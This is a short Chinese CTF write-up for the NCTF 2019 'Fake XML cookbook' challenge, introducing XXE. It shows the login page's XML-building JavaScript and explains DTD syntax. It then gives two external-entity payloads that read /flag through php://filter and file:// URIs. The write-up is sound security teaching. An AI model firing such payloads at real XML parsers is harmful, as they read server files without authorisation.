Web入门-XXE初探

[NCTF 2019]Fake XML cookbook

看到代码：

function doLogin(){
	var username = $("#username").val(); //jQuery选择器
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin.php",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

XML文件格式：

<!--XML声明-->
<?xml version="1.0"?> 
<!--文档类型定义-->
<!DOCTYPE people [  <!--定义此文档是 people 类型的文档-->
  <!ELEMENT people (name,age,mail)>  <!--定义people元素有3个元素-->
  <!ELEMENT name (#PCDATA)>     <!--定义name元素为“#PCDATA”类型-->
  <!ELEMENT age (#PCDATA)>   <!--定义age元素为“#PCDATA”类型-->
  <!ELEMENT mail (#PCDATA)>   <!--定义mail元素为“#PCDATA”类型-->
]]]>
<!--文档元素-->
<people>
  <name>john</name>
  <age>18</age>
  <mail>john@qq.com</mail>
</people>

对于DTD实体声明为：

1 2	<!DOCTYPE 根元素 [定义内容]> <!ENTITY 实体名 "实体值">

本题有两种Payload：

<!DOCTYPE root[
	<!ENTITY  xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
]>
<user>
    <username>&xxe;</username>
	<password>1</password>
</user>

<?xml version="1.0"?>
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">]>
<user>
    <username>&xxe;</username>
    <password>password</password>
</user>